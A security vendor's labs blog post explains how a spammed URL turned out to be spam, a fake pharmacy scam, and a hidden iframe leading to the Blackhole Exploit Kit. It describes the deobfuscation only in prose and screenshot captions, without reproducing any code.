Blue Coat Labs

Labs Blog

Spam, Scam, or Malware?

Spam, Scam, or Malware?

Chris Larsen, Adnan Shukor

[Another great post by Adnan in our internal blog. Definitely deserves a wider audience... --C.L.]


Recently, we saw several customer submissions of a particular URL. One thing that caught my attention: the three submitters suggested three different categories for the rating. (The suggestions were: “Malicious Sources”, “Spam”, and “Scam/Questionable/Illegal”.)

The question is, do they really understand the meaning of the category they chose, or was each person seeing different things on the link/page?


So I spent some time before my lunch break, and here is my analysis on the incident.

First, all the submitters agreed that they received the URL/link in a spam email. So a “Spam” rating would certainly be accurate. Next, I tried to simply browse to the URL. It's a redirect to a scammy "Canadian Pharmacy" site:

screenshot of pharma site

(So a rating of "Scam/Questionable/Illegal" would also be reasonable.)

Here's the content of the URL before the redirection:

screenshot of obfuscated javascript

Some obfuscated JavaScript, followed by the redirection code at the bottom.

One of the submitters said that his antivirus triggered an alert once opening the URL and straight away blocking the page on the browser. This is why he chose “Malicious Source” as the suggested category. Meanwhile, the other submitter said that he can only see a fake pharmacy website once clicking on the URL, making his decision to go with “Scam/Questionable/Illegal”. Let’s see what is in the obfuscated JavaScript before we proceed with the conclusion:

initial de-obfuscated view of the javascript

(Code beautifier applied to the JavaScript before deobfuscation is performed.)

completely de-obfuscated view

Perfect! An invisible iframe to a Blackhole Exploit Kit! Browsers with JavaScript enabled will be redirected (via the iframe) to a Blackhole Exploit Kit page, and then redirected to a scam page, the fake Canadian pharmacy site. (Browsers with JavaScript disabled will just be redirected to the scammy site.)


So, yes it is a scam URL, but it is also a malicious URL. … and it is distributed in a spam mail. So everyone was correct, the URL (together with the Blackhole site and scam site) is blocked, and everyone is safe and happy.

Thanks to everyone who took time to submit the URL! We really appreciate your efforts to submit malicious/suspicious URLs for our review. It helps everyone when we work together.

Till next time, stay safe everyone!


-- Adnan Shukor



[Other relevant details: the attack site was automatically flagged in our database by the Malnet Tracker three days ago, and was added by the Spamnet Tracker a week ago. --C.L.]